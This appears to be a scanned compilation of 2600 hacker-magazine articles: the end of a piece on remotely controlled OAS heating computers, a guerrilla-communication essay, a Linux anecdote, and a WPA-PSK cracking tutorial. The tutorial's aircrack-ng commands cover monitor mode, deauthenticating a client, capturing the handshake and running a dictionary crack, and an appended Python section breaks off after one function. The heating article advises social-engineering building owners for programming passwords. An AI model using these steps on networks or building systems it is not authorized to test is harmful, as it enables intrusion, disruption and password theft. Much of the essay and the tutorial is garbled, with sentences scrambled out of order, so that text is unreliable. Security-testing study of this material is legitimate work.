The OAS website also declares that the software, while downloadable, must be registered over the phone before use (presumably with the purpose of the confirmation of one’s status as a customer), lending credence to the notion that OAS does not intend for the public to have unhindered access to Master95 and that the password protection is a feeble form of security. The author is not aware of any additional features that may lie behind that password prompt–it may be reasonably assumed that none exist since the software itself is clearly labeled as the “Full Version” when “About” is selected. Remember, though, this is simply another instance of security through obscurity, assuming that one will not attempt to open it with archive software, an absurd assumption as it clearly identifies itself as an archive under “properties.”

At first glance, the Master95 software appears to merely be an alternate way to access heat computers and administer them using a GUI and menu system, if one prefers a GUI, but it does reveal a few interesting things. The password box only accepts ten characters, revealing the aforementioned fact that passwords are ten characters long. Of foremost interest to the reader may be the commands help file, which presents in a succinct format all the descriptions of the current report, event log, and so forth, although it completely lacks explanation useful to an outsider (unauthorized user, i.e. hacker) such as explanations of ultimate application to heat and descriptions of boiler operation, as it assumes that the software user will be trained in such matters.

Master95 also serves as an effective organizational tool for heat computer management, incorporating into its array of utilities a building list in which heat computers (and the other types of systems) may be sorted based upon address, an assigned ID, and dialup. Editing the properties of a particular building in this list entails the assignment of an ID, setting the type of unit (Heat, Heat 7000, Oil Tank, Fire Eye), the baud at which it connects, and the “port switch.” These connect at 8,N,1 as the heat computer text does not display properly when a heat computer is dialed and either option is selected. To configure these parameters, select “Setup Parameters” under the “Tools” menu. Observing the window, one will notice that other OAS products controllable over modem are listed–a mildly interesting bit of information. OAS is extremely zealous in advertising, providing details as to the technical specifications of models sold in numerous public releases. Perhaps it would be lucrative to watch wardial logs for anything mentioning a “tank computer” or a “fire eye.” The following banner demonstrates the general format and appearance of tank computers, which are used to monitor liquid inside of tanks, such as oil:

OAS Tank Gauge 145 ATLANTIC STREET 4:30P Sat Dec 17, 1993 TANK CAPACITY: 5000 GALLONS

Tank computers are a subject for another article.

“Tools” for building lists include daily and single collection, summer/winter programming, and clock programming. The latter two are simply an automation of the programming set points process for the summer/winter option and time, date, and clock programming. Daily/single collection is a slightly more complex automation, in which the user may program the software to dial selected buildings in the list at a specified time and day, execute commands, and store the output in a file with the extension .sum, for “collection summary,” in the directory in which it is run. Building lists may also be imported from older, DOS versions of Master software with the file option, “Import Old List.”

Upon establishing a connection to a heat computer through the software, under the “direct dial” option when the option “building list” is selected, one may enter commands manually in the blue terminal window in which all output is viewed, or using the drop-down menu system. Notice the command “Real Time Display”, under “Commands”, sent by the keyboard shortcut Alt+R, a display of the constantly fluctuating temperature of the area surrounding thermistors. This is a hidden command, not documented in the list provided with a “?”! Selection of this during a session will pull up a “Command Select” box, with four commands listed that accomplish this–R, RA, RB, and XR. RA and RB will not work on this particular model/type of heat computer at all, and may produce erratic results on other models. XR displays the report and alters it in real-time. While in most cases the two reports may be identical, a slight discrepancy may be seen between them.

Conclusion–Thoughts on Security

The problem as here present insofar as security is primarily that a very limited amount of seemingly innocuous information can lead to extremely specific information useful in penetrating and taking complete control of specific units. The attainment of the dialup to a heat computer, for instance, can lead to the address of the unit and possible numbers at which the owners/operators may be contacted. A simple understanding of human nature suggests that people will be much more susceptible to social engineering, that is, much more willing to give out the programming password, when faced with a potential disaster such as complete cutoff of heat in the dead of winter, or even something minor such as a small water leak or a dirty coil. One could even carry this social engineering scheme so far as to call up the building owner/manager with an actual problem visible in the report, a difficulty only repairable by remote programming, and proceed to correct it upon learning the password! While in some regards OAS can hardly be blamed for certain aspects of the nature of heat computers that render them so incredibly predisposed to control by outsiders–attributes such as the remote accessibility over phone lines, un-passworded execution of seemingly harmless commands–leaving such systems that control heat to an entire building lying about on the PSTN and, recently, the Internet, is frankly unwise. And, while I most certainly do not condone exaggeration of the problem, all of this is definitely something to ponder as these systems begin to make their way onto the Internet. While manufacturers of some devices

have realized the folly of unnecessary remote access, heat and building automation systems are likely to become even more accessible in the future. From an explorer’s standpoint, the thought that an individual in a remote location could with relative ease (here it is important to remember that while OAS Heat Computers may be uncommon, other heat computers and building maintenance systems exist in abundance, especially in large cities) direct the equipment that administers heat and water to a large building is slightly disturbing. Still, heat computers of all types provide a relatively safe venue through which a fairly extensive assortment of technologies may be studied–boilers are nearly as complex and interesting as phone systems or any one of the other self-contained networks of mechanical and electronic parts that comprise the modern world. If, by any stroke of fortune, the curious hacker reading this article should happen to find an OAS Heat Computer, I advise him or her to align subsequent actions with the Hacker Ethic, as a matter of course, to refrain from actuating the causation of any permanent or immediately serious problems with the system either unintentionally (as preposterous as that may sound) or intentionally, in the true spirit of hacking.

Although it was extensively researched, I authored this article strictly from the perspective of an outside hacker experimenting with the system–a good deal of information presented here was garnered from experimentation and observation, although conjecture and speculation is labeled as such, and as such is not all-inclusive by any means. If anyone should happen to possess a superior command of such systems as were discussed in this article, I would like to hear from you; to this end I encourage the use of the letters section of 2600 as a public forum to further knowledge upon this topic. Redundancy here (presentation of details present in the help file of the Master95 software and so forth) exists in order to provide readers with a reference that may be used both as a quick guide to heat computers without the help file or the official manuals, as well as an explanation of, for evident reasons of expediency, potential unintended uses for the various options therein. Slight details are available in the help file of Master95 and elsewhere that are not mentioned here–get the software! A grayscale photograph of an OAS Heat Computer unit is available at the time of this writing on http://www.homeenergy.org/archive/hem.anl.gov/eehem/picts/97054101.gif, and other pictures of the front panel are available on http://www.oas-inc.com/.

I may be contacted on IRC on 2600net in #2600, #telephreak, and #telephony, on the Telephreak BBS at telnet://bbs.telephreak.org, or at my email address: philosopher2600@gmail.com with any questions or input.

Shoutouts to rev, ThoughtPhreaker, DCFlux, whitehorse, radio_phreak, bomberman2525, Substance, everyone in #telephony, Binrev and the DDP, the broad class of people who ever wrote anything that contributed to my underground knowledge base, the anonymous person who posted the logs that initially brought heat computers to my attention, and OAS for manufacturing such interesting, useful, and vulnerable products. If I have forgotten or omitted anyone else, please forgive me with the assurance that your contributions and the general benefits of our interactions do not go unnoticed and underemphasized.

like the working class and . You could. Guerrilla communication exists to fight the media system and the reality produced by this system. or sex. Some guerrilla communication theories may take left-wing or Marxist positions in regards to the social factors underlying and forming a society.” one of the biggest art fairs in North America.VOLUME 26
141
.the networking class. spread business cards. for example. heuristic power in the modern world. It also suggests that media defines and preserves the status quo. Capitalism is a totalitarian doctrine whose very structure. it still remains within the construct of “good” capitalism versus its evil twin “bad” capitalism. It is inspired by various theorievs on social communication and includes positions that tend to focus merely on the government while excluding other factors from analysis. you have to hack the system.” to take control of and to modify their basic human needs and relationships. The word “guerrilla” suggests that there’s a war going on. Whoever controls the media controls everything. The status quo of a society in which knowledge and information are not only means of controlling people but also ways of segregating people into classes. And I am about to tell you what that is and how it works.” Günther was walking around the fair and did what every good businessman should do. and operating mode is considered to “alienate humans. freedom of speech and Twitter. purpose. we told all the people that we had to take Günther into custody and would have to dissolve his body in acid. Our press release stated that Günther Friesinger (a member of our group) was carrying a “rare.” Additionally. Publicity means to expose yourself and therefore you can be attacked. While this strategy is useful in pointing out the power of consumers. Never forget that there is no such thing as “good” or “bad” capitalism. Some years ago we used these techniques to stage a deadly virus outbreak at “Art Basel Miami Beach. creating a simplified portrait of social powers. were “contagious” and a small group in hazmaz outfits later tried “to retrieve and destroy the business cards he has spread. So what can be done about it? The classic guerrilla communication tactic is to launch small but effective attacks on an enemy which is much bigger but also hampered due to institutionalization. 
of course. my black-shirt-with-penguin-wearing friends. One that sucks.it is always owned by somebody. but highly contagious subform of the Arad-II Virus (Onoviridae family). guerrilla communications aim to interfere in the monologue of bourgeois mainstream media and to show how reality and normality are defined through media control and access to public spaces. decide to boycott a product as long as it is advertised. of course. There’s no such thing as free media. all our so-called free media. And we wanted to create a statement about the disgusting networking and business aspects of the art market. There’s a wide range of strategies guerrilla communication could use. shake hands. But the business cards. it’s all bullshit. race. It was interesting to see how many people were thanking us for our service. We wanted to address the hysteria of the post-September 11. Media is the strongest political. that’s us.
Hacker Perspective
Johannes Grenzfurthner monochrom
The Medium is the Mess-Up or: How to Hack the World
Most of us know and understand that the major power of today’s world is the media. So if you want to do anything about it. So long as you can’t download your iPhone. Mocking strategies are especially useful in attacking a single player like a multinational by trying to stain his image and tactically embarrass him as a warning to stop the evildoing. our Creative Commons tracks.
Unlike guerrilla warfare. That can be done with something called guerrilla communication. It’s (as always) about controlling the means of production.Western culture . Small talk. This could be a personal interpretation of guerrilla communication. And most of us do not own significant parts of it. Most of them have something to do with mocking or mimicry of official communication. such as class. and. Advertising is inherently public and something that tries to give instructions can be obeyed or disobeyed by not playing by the rules. I’m part of the political art/tech group monochrom. These tactics are adapted from classical guerrilla warfare (which already made use of guerrilla communication against its enemy’s communication system). 2001 attacks about biological warfare and the media coverage about bird flu. And since the media is not nature but culture .

wouldn’t want to experience because it’s dangerous. because it’s rather naïve: it tends to be the best products which are advertised because they are advertised. It should be clear that guerrilla communication doesn’t have a military goal in the classic sense of destruction. Therefore. Punk. These people developed strategies to provoke and challenge society. are masters of the typical company spokesmen body language and tone of voice. Brazil in 2002. His art piece dealt with the mistreatment of Taiwanese people in mental asylums. and recipients. What they do is no longer parody.and create a bunch of diplomatic problems . etc.are you a hacker? One of the basic strategies is faking things: press releases by political parties or companies. You could sabotage instructions by misinterpreting them and acting dumb. Through the implementation of this ironic mechanism . but nobody wanted to inform him. Georg Paul Thomann proved to be a potent payload for political content.I guess they just didn’t know how to google . What’s new about all of this? Nothing. Guerrilla information. A “t” from Austria (equals Aus ria). It means that you use affirmation to a degree that goes beyond the conventional to show what something really means . However.. Communication guerrillas do not intend to occupy. One Taiwanese newspaper headlined: “Austrian artist Georg Paul Thomann saves ‘Taiwan. The street is synonymous for public space and the humdrum surface of society.’” A non-existing artist saves a country that shouldn’t exist? Well. fuck our nation). The artist Chien-Chi Chang was invited to the Biennial as the representative of Taiwan. The earliest forms of modern guerrilla communication can be found within the WWI art scene. to implement their political agenda into the public space. that was a bad time!) gave us concerns about acting as representatives of “our nation” (well.Taipei. 
when a group of international artists and deserters met in Zurich on neutral Swiss ground to launch the Dada movement. One of our own exploits was started in 2001. but Taiwan’s name tag was removed by people working for the administration. But we decided to deal with the problem by creating the persona of Georg Paul Thomann. You could say that it’s all about playing with representation and identity. Oh wait . I love postmodernism.
I guess. But moreover. But this fact can be a powerful ally. so it was very important for him to be the official Taiwanese representative. The media reported about Thomann as the official Austrian representative . it was considered the perfect
. for example. You see.” For Chien-Chi Chang this was very irritating. And after some time Chang could remount a trashy new “Taiwan” outside his room. the communication guerrilla doesn’t claim the invention of a new politics or the foundation of a new movement. websites. But standing on the shoulders of earlier avantgardes.” So we started a solidarity campaign and began to collect letters. interrupt. laying the foundations for such radical art movements as The Situationist International. We started some research and discovered that China had threatened to retreat from the Biennial . an irascible.but also to act out the habits and conventions of your enemy. Chang was very pleased and several reporters took pictures and took notes. The Yes Men. of course. occupation. even your own life.THE HACKER DIGEST . but mimicry.” Most of the work was writing his 500 page biography. as well as for personal habits. You could say that guerrilla communication is not trying to destroy the dominant codes but rather to deconstruct and strategically abuse them for its own purposes. and Neoism. Information and political education are completely useless if nobody wants to listen.even the catalogue included the biography of the non-existent artist . and to start reclaiming the streets. He tried to get information. alienation and identification. But it doesn’t aim to destroy the codes of power and signs of control. Rather. suppression. mimics classical marketing tools and knowledge. it is direct action in the space of social communication. My group monochrom was chosen to represent the Republic of Austria at the Sao Paulo Art Biennial in Sao Paulo. but twists it in the opposite direction. or destroy the dominant channels.and so our strange art avatar suddenly was a cultural ambassador of “our country. Several Asian newspapers reported on the performance. for example.” And all the members of monochrom were his technical support team. 
It’s about putting special groups like the people of Bhopal on the map of global consciousness. codes. And the Canadians really didn’t need all three “a’s. They focus on detouring and subverting the messages transported. guerrilla communication is a versatile practice of cultural resistance. controversial (and completely fictitious) artist of “longstanding fame and renown. senders.if the organisers of the Biennial were thought to be challenging the “One-China policy.we tried to hack the philosophical and bureaucratic dilemma attached to the system of representation. The country’s name on his cube was replaced overnight by new adhesive letters: “Museum of Fine Arts. Guerrilla communication doesn’t focus on arguments and facts like traditional communication. That goes for factory workers as well as for all you white collar supremacists: why not use the CD drive in your office computer as a coffee cup-holder? It’s got a tinge of freedom to it which you. This works for press releases and interviews. it inhabits a militant political position.” etc. It’s the freedom of something that exists beyond the mere functionality of the way it was intended. It is merely continuing an exploration of the jungle of interaction processes. or extermination. the rightwing political climate in Austria (fuck.

Its fundamental strategy is to misappropriate images. At the same time the squatters’ movement emerged: Post-bourgeois artists attacking actual private property as well as non-material cultural property. are still around in the guerrilla communication movement of today. but also how the code .the way in which the media shapes and constitutes reality . for counterinforming people. we promote a concept called “Sculpture Mobs. oblivious of the fact that it was spreading a hoax. and therefore can be overwritten in the same way you can overwrite an advertisement.” Art is the place where things might be reflected. the Situationist Movement defined a form of art called “détournement. rather. Most activists came from a classical art or journalist background but had reached the conclusion that nobody really listens when you speak in the traditional art space.come to believe that white suburban males are meant to rule the world without even once spending a thought on it? How is the sexist and racist and classist subconsciousness of the liberal society shaped through the media and access to it? Any suggestions? I’m sure you won’t have any because it is just the nature of the capitalist and bourgeois media flow. What is lacking is a concise theory of what bourgeois society is like and what should be attacked by us.shows no respect for the fact that the media and the public space as well as the images and cultural frameworks we live in belong to the bourgeois. As long as you simply play around with the media . Why under five minutes? Because that’s the time you have if you set up a sculpture . And that is what must be hacked and changed to make it visible and questionable. In the 1970s. but as a form of irritation. A popular slogan suggested people “invent false facts in order to create real events. too.the very structure . in shopping malls! It is time to create DIY public art! Get your hammers! 
Get your welding equipment!” So we started to host training sessions and we began teaching interested people how to erect public sculptures in under five minutes. they came up with the post-modern idea that social structures are texts. Even if people would go. You have to know how everything works . Pirate radio stations appeared and hijacked radio frequencies. counterculture split into a more traditional Marxist wing consisting of small parties and groups that wasted a lot of their precious time and beautiful youth to fight each other. But that should by no means be the ultimate goal.let’s say at a Wal-Mart parking lot . California.even as a media pirate or hacker you are still part of the system. we created a political illegal public sculpture called “The Great Firewall of China” at the Google Campus in Mountain View. and radio frequencies and shift them to different contexts.” To quote our own pamphlet: “No one is safe from public sculptures.” So.just like hackers not only know what a website is and what it looks like and how it works. Otherwise. A great part of the movement has made it to the top of our society and its institutions . Art is a special task and a special place for special people.’ Unchallenging hunks of aesthetic metal in business parks.not as a service (as it is to the bourgeois elite art consumer). roundabouts. And we set up various realistic looking antitank obstacles in inner districts of various cities. This was one of the many starting points of guerrilla communication as well as the so called “reclaim the streets” movement which includes funny yet irritating activities like Flashmobs . But what do we know about the cultural code of messages? Do we really understand how.and Adbusters.
stage for informing people or. Guerrilla communication . those endless atrocities! All of them labeled ‘art in public space. we will just be going round in the same old circles as the history of guerrilla communication clearly shows. The post-bourgeois artists tried to bring art back to the people . As part of monochrom. it becomes clear that these strategies were an early form of viral marketing for the rebels themselves. We named these pieces “New Kids On The Road Block. but that amounts to nothing since it’s removed from everyday life. That’s why we need to hack into media and change its message flow and the stereotypes it communicates. And hacking is a means of guerrilla communication because it is a hostile assault from outside the system trying to find a way to change or manipulate it from within. In France.works. Graffiti was an important weapon of that movement to overwrite the text of the city. guerrilla communication is hacking. Only once something can be seen will we realise what has been invisible before. for example. Looking back at the guerrilla communication movement.” As part of the project. heterosexism is cemented in our society via texts and images? What about cultural stereotypes? How do we .like the former German minister of foreign
.unlike everybody else . Plenty of their strategies. words.before “security arrives. in a certain way. In its best and most far-out moment.” It means that you roam aimlessly around the streets and take what you find and then do something with it. Your average guy does not go to exhibitions or concerts and rarely sees counter culture media. like throwing pies at celebrities.or at least some of us . They too started working with fake information and actions distributed via the bourgeois media. they would consider what happens there to be “just art.” but they too made real objects and did cultural piracy stuff like pirate editions of the socialist classics or handing out counterfeit subway tickets. You have to change the political economics of a society.

affairs, Joschka Fischer, once a notorious player in the huge Sponti-movement in Frankfurt before turning into a complete butthead. It is all about success. Success is what you want, isn’t it? If so, do me a favor and erase all the information I just gave you. Maybe not sharing the information would be the utmost guerrilla communication act.

Johannes Grenzfurthner is an artist, writer, director, and DIY researcher. He founded monochrom (an internationally acting art-tech-theory group) in 1993. He holds a professorship for art theory and art practice at the University of Applied Sciences, Graz, Austria. He is head of Arse Elektronika (sex and tech) festival in San Francisco and co-hosts Roboexotica (Festival for Cocktail-Robotics). Recurring topics in his work are: contemporary art, activism, performance, humour, philosophy, postmodernism, media theory, cultural studies, popular culture studies, science fiction, communism, sex, and the debate about copyright. http://www.monochrom.at/english/

Granny Loves Linux!
by Metaranha
Those who are educated in a higher level of computer use (i.e., readers of 2600) are already aware of the majesty and power of Linux. Slowly, the rest of the world is coming to understand those factors as well, but the question of which demographic to target with Linux and its variants is a little bit hard to hit. This article will not try to make any wild suggestions on who to give Linux to, but will instead offer interesting insight into two people who have chosen to live with Linux and are doing very well in their life after Windows.

About 6 months ago, my boss asked me to take a look at his mother-in-law’s computer. I was only told that the computer was slow. He instructed me to take company copies of Microsoft Office XP and Windows XP Professional, and have her give it a try. I acquiesced for the extra hours and left home bound for an elderly stranger’s house. We will call her Mrs. N. Mrs. N is in her mid 70’s, and has an HP computer that was made within the last year. There was no reason why the hardware shouldn’t work right. I took my Hardy Heron live cd, arrived at her house in the afternoon, and asked her what types of problems she was having. She told me that she didn’t use the computer for anything besides Internet access, pictures and writing documents from time to time. My question was answered with the appearance of the Windows Vista loading screen. “It works a lot like Windows,” I said, and followed up with “but it doesn’t work anything like Windows.” So I threw in the live cd and asked Mrs. N to take a seat and see what she thought. I gave Mrs. N the same quick Ubuntu tour that I gave my previous “apprentices” and she took to it fast. “Look at it this way,” I told her, “you’re going to be learning something new anyway. With Linux, you won’t have to worry about viruses or spyware, and all of the programs you may need to use in the future are free, along with the operating system.” “Free you say?” she asked. Being that we’ve got a recession on, it’s not going to be hard to convince her to use it full time, but I didn’t know if I had sold it well enough yet. So in the end, Mrs. N’s love for Linux is still rolling strong.

My wife’s parents are in their mid 50s and take a hard line against using computers at home, partly because they have to interact with them so frequently at their workplaces, and partly because working with computers is far from their forte. Recently, they were forced to give in to the demands of the modern world and asked me to set up my wife’s old computer for them. The old Dell GX 260 was in dire need of a new operating system and, it will either be Windows Vista, or Suse, or Ubuntu Linux. Having no extra Windows disks around (coincidence?), I suggested that they give Linux a try. One week later, I installed Ubuntu Linux on my mother-in-law’s computer. I sat down with the wife’s parents, gave them a very quick “how to,” and away they went. It didn’t take long at all for both of them to pick up the computer and do what they needed to do. Their computer is still working as well as it was the day I installed Linux, and they have had very minimal problems with using it.

Finally, the point here is to not underestimate the power of the casual user and elderly demographics. So the next time you visit grandma, take a copy of Ubuntu, and you’ll save your dear old granny the headache of using and maintaining Windows when all she wants to do is see pictures of her family and talk to you.

by Mister Cool

WPA/WPA2 is a leading method of securing one’s wireless network. I would like to share with you today a method of cracking a WPA-PSK password on a wireless network. The main tools utilized are Back Track 3 (aka BT3, a live Linux security distribution freely available at http://www.remote-exploit.org/backtrack_download.html), and the Aircrack-ng suite (a set of tools for auditing wireless networks, included in the live CD pre-installed).

First, a little background on WPA-PSK. Many home and small office users today utilize the WPA (WiFi Protected Access) - PSK (Pre-Shared Key), aka “Personal,” option to secure their wireless networks. (Please go to http://www.wi-fiplanet.com/tutorials/article.php/3667586 for details on different types of wireless protection.) WPA is basically a security protocol and the PSK is a password/key. The Pre-Shared Key is a password or passphrase created by the administrator of the network, generally ranging from 8-63 ASCII characters (although it can be 64 hexadecimal digits). This plain text password (also called the Master Key, or key) is mixed or “salted” with the wireless network name (aka the SSID, “Service Set Identifier”), to create a 256 bit value called a “hash.” This hash value, commonly referred to as a PMK (Pairwise Master Key), is shared between an Access Point and a client, and will essentially be used to allow for the encryption of all network traffic. (For more on how hash functions and keys work, see http://www.xs4all.nl/~rjoris/wpapsk.html.)

Most wireless networks use what’s called an Open System Authentication to connect to an AP (Access Point). In simple terms, the steps are:
1. The computer asks the AP for authentication
2. The AP responds: OK, you’re authenticated
3. The computer asks the AP for association
4. The AP responds: OK, you are now connected
What’s known as a “four-way handshake” occurs during this connection process when utilizing WPA, and is what enables us to perform a WPA crack. The more specific term for what happens during the handshake is called EAPOL (Extensible Authentication Protocol) authentication and, if WPA is in use, you will be denied at step 2 without the password. (Visit http://tldp.org/HOWTO/8021X-HOWTO/intro.html, and http://sid.rstack.org/pres/0810_BACon_WPA2_en.pdf for an exacting explanation of what occurs during the four-way handshake process.)

All wireless networks transmit data packets through the air. The method of cracking a WPA password is slightly different than that of cracking WEP (Wired Equivalent Privacy). It is well documented that WEP is, by design, vulnerable to various types of attacks. For a WEP crack, we would need to capture a large number of these packets (usually at least 40k-85K) which contain the IVs (Initialization Vectors) necessary to break the WEP password. Unlike WEP, in WPA the only thing that will enable us to even start the attack at all is what’s called the “four-way handshake” between the client and the AP. Collecting more packets after we capture this “handshake” will not increase the chances of successfully recovering a WPA password.

The main method of attack with this type of wireless encryption is ultimately a standard dictionary attack, though we could attempt a brute force attack. The WPA password can only be found if there is an exact match in the dictionary (aka wordlist) you are using. If the password is a common word in the dictionary, it will probably be found when we implement a dictionary attack. If the password is not in the wordlist, you will not crack the password. If a password is aardvark, it is very possible to recover. If the password is aardvark1, the same dictionary attack will most likely fail as the “1” is not likely to be found in most wordlists. And therein lies the weakness in WPA: The human element. A WPA key is only as strong as the user who sets out to make it. The single most important thing to remember when attempting a dictionary attack is this: The attack will only be as good as the wordlist/dictionary file you use. There are many wordlists and dictionary files available out there. (Visit http://packetstormsecurity.org/Crackers/wordlists/ for a robust selection of freely downloadable wordlists.) I utilized a wordlist I found within Back Track 3 for this tutorial. A WPA-PSK key is a required minimum of 8 characters long and it could take hundreds of

years to crack even at that length, depending on factors such as the power of the computer, numbers, upper and lower case letters, and special characters. For a sample brute force time calculator visit http://lastbit.com/pswcalc.asp# and http://searchmobilecomputing.techtarget.com/sDefinition/0,,sid40_gci1319465,00.html. The main difference between WPA and WPA2 is that WPA uses the older TKIP (Temporal Key Integrity Protocol) encryption type scheme, while WPA2 utilizes the newer AES (Advanced Encryption Standard) encryption scheme which employs CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol). (For details on CCMP, visit http://www.pcmag.com/encyclopedia_term/0,2542,t=AES-CCMP&i=37582,00.asp. See http://www.networkworld.com/columnists/2006/091106-wireless-security.html?page=1 and http://www.openxtra.co.uk/articles/wpa-vs-80211i.php for a more detailed explanation of WPA vs. WPA2.) WPA and WPA2 personal are essentially the same for our purposes, as the method to recover these passwords is identical.

Let’s try our hand at cracking a WPA-PSK encrypted Wireless Network with this simple exercise. In this particular example I used:
1. A Toshiba Satellite L35-S2151 Laptop as the attacking PC (any computer with a supported wireless card should work)
2. An Atheros pre-installed wireless card (model AR5005G - many other cards are supported, see http://www.aircrack-ng.org/doku.php?id=compatibility_drivers)
3. Dell Inspiron 1000 as the client associated to the AP (aka the “client”)
4. The Back Track 3 Live CD
5. A target AP transmitting through a Linksys WCG200 Cable Gateway

Our goals:
1. Set the wireless card in Monitor Mode with airmon-ng
2. Sniff for networks with airodump-ng
3. Find a client associated with the target AP, and start a capture file with airodump-ng
4. Deauthenticate the client from the AP using aireplay-ng and, upon client reconnection, capture the WPA handshake
5. Use the capture file containing the handshake in aircrack-ng to find the key

Now to the Good Stuff:
Start your computer with the Back Track 3 Live CD, and open a command shell (lower left tool bar, second icon in).

1) Set your card in Monitor Mode. This is necessary to allow your PC to listen to every wireless packet. This monitor mode also allows you to optionally inject packets into a network. Injection is useful to create network traffic if the network is not particularly busy. Injection is not absolutely needed to capture the handshake, but I have found it helps in finding associated clients. First, to stop the wireless card at the command prompt type:
airmon-ng stop ath0
Where ath0 is our interface (Atheros wireless card). Next, to start the wireless card in monitor mode type:
airmon-ng start wifi0 6
We must use “wifi0” instead of “ath0” as we are using the madwifi-ng drivers which are specific to the Atheros cards. The “6” at the end is the channel the card will operate on. We generally want to match this to the channel of our target AP. The output should indicate the interface ath0 is now in monitor mode.

2) Now, to see what networks are out there, type:
airodump-ng ath0
This will show all the networks in range. The output will look something like:

 CH  3 ][ Elapsed: 52 s ][ 2009-01-18 21:28
 BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER AUTH ESSID
 00:18:F9:1A:13:30   35      244      4    0   6  54   WPA   TKIP   PSK  linksys
 00:1D:7E:2C:E7:BF   23      109      3    0  11  54   WPA2  CCMP   PSK  2600
 00:1F:90:E3:19:26    7       18      1    0   1  54.  WEP   WEP         NETGEAR
 BSSID              STATION            PWR   Rate  Lost  Packets  Probes
 00:18:F9:1A:13:30  00:12:50:47:1A:DA   32  54-54     0       15

Where, notably: BSSID (Basic Service Set Identifier) = AP MAC address. ESSID (Extended Service Set Identifier) = Network Name (sometimes referred to simply as an SSID). ENC = the encryption type, usually: OPN (open), WEP, WPA, WPA2. CIPHER = the cipher used (WEP, TKIP, CCMP), usually TKIP with WPA and CCMP with WPA2. AUTH = authentication used (we’re looking for PSK). CH = channel of AP (note the CH in the upper left will be hopping, this is showing the channels that are being scanned for networks). MB = Network Speed (54 is wireless G). Station = client MAC address. As you can see, there were 3 wireless networks found. We are in luck as we have an associated client on the “linksys” network to target for our attack.

once the command runs.com/faq/ for more details on how these tables work. (See http://www. This is why the Church of WiFi has precomputed hashes in what they call a “special” Rainbow Table (actually a PMK lookup table) against a 172.net/projects/ ➥WPA-tables/ for more information on these tables.txt. -w = tells the program to run a wordlist. The only caveat is that the time must be spent to do the initial pre-computation.grc. you should make your password something not found in a dictionary and somewhat random. We will attempt to deauthenticate the client from the AP and. it can be near impossible to break if the password is random enough. Further.” These tables employ a time-memory trade off. try one of these out for maximum security (https:// ➥www. And if you use “password” as your key. This pre-computation drastically decreases the amount of computing power and time needed to find the correct key. If the network name (SSID) was “linksys.renderlab. If the key is found the output will read similar to:
KEY FOUND! [ password ]
In this case the WPA-PSK password was “password” and we cracked it! (For more detailed information on the entire aircrack-ng suite visit http://www. so that they do not have to be calculated during a dictionary attack.THE HACKER DIGEST . A successful capture of the handshake will show in this case as: [WPA handshake: 00:18:F9:1A:13:30] in the upper right corner next to the date and time of our original output screen. but this can be any number. You will eventually get the interface and AP on the same channel.000 common SSID’s.aircrack-ng. 4) Now. keep trying the command. it’s much easier to do the calculations for the hash values once and store them for later use. However.) Note that a traditional Rainbow Table will not work to crack a WPA password. as the original hash value is salted with the SSID.000 word dictionary for 1. You may have to enter the command more than once. While not impenetrable. and the cracking process can take hours.htm for more details). than it is to calculate them every time they are needed. it does not always immediately capture the handshake.cap -w ➥/pentest/wireless/aircrack-ng/ ➥test/password.” then the same pre-computed hashes will not work. The main lesson to be learned is that if you use this type of encryption.VOLUME 26
Optional: If you wish to do an injection test open a new shell and type:
aireplay-ng -9 ath0
If successful, you will get as part of the output message: Injection is working!

3) Next, we want to focus on our target AP, in this case the "linksys" network. Open a new shell and type:

    airodump-ng -c 6 -w capturefile --bssid 00:18:F9:1A:13:30 ath0

Where -c = channel of the AP, -w = the capture file (any name will do, in this case "capturefile"), --bssid = target AP MAC Address, and ath0 our interface. The output will look almost the same as our original output above, but with just the one AP showing. The captured information will be saved to our capture file. Sometimes the output will indicate that the interface (ath0) is on a different channel than the AP. If this is the case, be patient.

4) Now we need to capture the handshake. Open a new shell and type:

    aireplay-ng -0 5 -a 00:18:F9:1A:13:30 -c 00:12:50:47:1A:DA ath0

Where -0 = the deauthentication attack, 5 = the number of tries for the deauthentication attack (I have found good success with 5; too high a number may cause the client to fail to reconnect!), -a = AP MAC address (bssid), -c = client (Destination) MAC address, and of course ath0 = our interface. I often use this as it sometimes causes associated clients not showing in our output to show up. The client is forced to re-associate and, when it reconnects, we will capture the handshake! Deauthentication is an active, disruptive step, so only run it against a network you are authorized to test.

5) Now for the crack! Open a new shell and type:

    aircrack-ng capturefile-01.cap /pentest/wireless/aircrack-ng/test/password.lst

Where capturefile-01.cap = the capture file, and /pentest/wireless/aircrack-ng/test/password.lst = the location of a wordlist that is included in the aircrack-ng suite for testing. This dictionary file is not very big, but suitable for our testing purpose. Be patient. Sometimes the dictionary files themselves are huge, and the crack can take a very long time, even days! But the computations can be sped up by pre-computing the original hash value (the PMK we discussed earlier), or using a "special" form of Rainbow Table. A Rainbow Table is a lookup table (similar to a multiplication table) that can be used to recover the plain-text password from a password "hash." Simply put, in reference to these tables, the potential hashes are all pre-computed. While these files are rather large, ranging from 7GB-33GB, they can dramatically decrease the time needed to find the correct password. This is easily accomplished by using either coWPAtty (included on the BT3 CD, located within the "Home" icon on the desktop) or a pre-computed table. (See http://www.kurtm.org/Contents/coWPAttyMain.htm or http://www.freerainbowtables.com/passwords.org) A set of hashes can only be pre-computed for one specific SSID at a time with any given dictionary file, because the SSID is the salt of the PMK. If the SSID was "2600," and the dictionary file was "wordlist," the pre-computed hashes would only work for that SSID and would not work for another SSID such as "linksys."

In conclusion, this is just a simple penetration test of WPA-PSK encryption. Choose a long, random passphrase; there are several random password generators out there (see http://wirelessdefence.net/wpa-pskgen/), and your network will remain relatively secure. Otherwise, you might as well not secure your network at all!
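As an added worked example (not from the original article and not the aircrack-ng or coWPAtty code), the Python below reproduces what step 5 does for every candidate word, and what a pre-computed PMK table saves. The handshake fields are constructed inline: the AP and client MACs are the ones from the commands above, the nonces and EAPOL-Key body are made up, the wordlist and the "2600"/"linksys" SSIDs are assumptions, and the MIC is computed from the "real" passphrase so that the crack has something to match. The IEEE test vector in the usage check (SSID "IEEE", passphrase "password") is the published 802.11i one.

```python
"""WPA/WPA2-PSK dictionary attack and SSID-bound PMK table, worked through in Python."""
import hashlib
import hmac
from typing import Dict, Iterable, Optional

PRF_LABEL = b"Pairwise key expansion"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    The SSID is the salt, which is why a pre-computed table only works for one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


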